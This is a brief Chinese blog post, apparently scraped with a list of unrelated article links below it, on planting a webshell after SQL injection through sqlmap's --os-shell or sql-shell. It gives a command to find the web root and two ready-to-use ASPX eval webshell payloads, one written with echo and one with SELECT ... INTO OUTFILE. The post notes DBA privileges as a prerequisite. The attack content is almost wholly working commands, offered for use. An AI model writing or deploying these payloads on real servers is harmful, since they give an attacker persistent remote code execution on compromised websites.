关于--os-shell写websell
2020-07-30 01:48
841 查看
1.首先需要知道目录(web目录)
2.得是DBA权限
寻找web目录
dir C:\ /s /b | find “xLogin.aspx”
这里需要注意转义^
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx'
os-shell 无法执行的时候,权限低的时候可以尝试 sql-shell写webshell
select '<%@ Page Language="Javascript"%> <%eval(Request.Item["pass"]);%>' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'
相关文章推荐
- 关于Palm Web OS
- 关于Web Service OS的总结
- 关于hbase中进入shell但是无法使用的问题,以及web界面为什么不能访问。
- 关于在web中的数据传递
- 关于android webview里HTML5的地理位置定位
- 关于移动web教程免费发布
- WEB前端:关于项目管理的思考
- os、os.path 模块中关于文件、目录常用的函数使用方法
- 关于web.config的处理以及改进
- 关于os的一系列问题:寻找目录中的视频文件,并存储路径
- Spring---Web MVC关于前台传值转换问题
- 关于Albatross web framework
- Android关于webview自适应与优化
- python调用Shell脚本:os.system(cmd)或os.popen(cmd)
- 关于学习Web前端半个月的总结
- 关于将dede织梦data目录迁移出web目录
- 关于web框架的一点思考
- 关于servlet的@WebServlet注解
- [原创]java WEB学习笔记35:java WEB 中关于绝对路径 和相对路径问题
- 关于浏览器和Web必须知道的20件事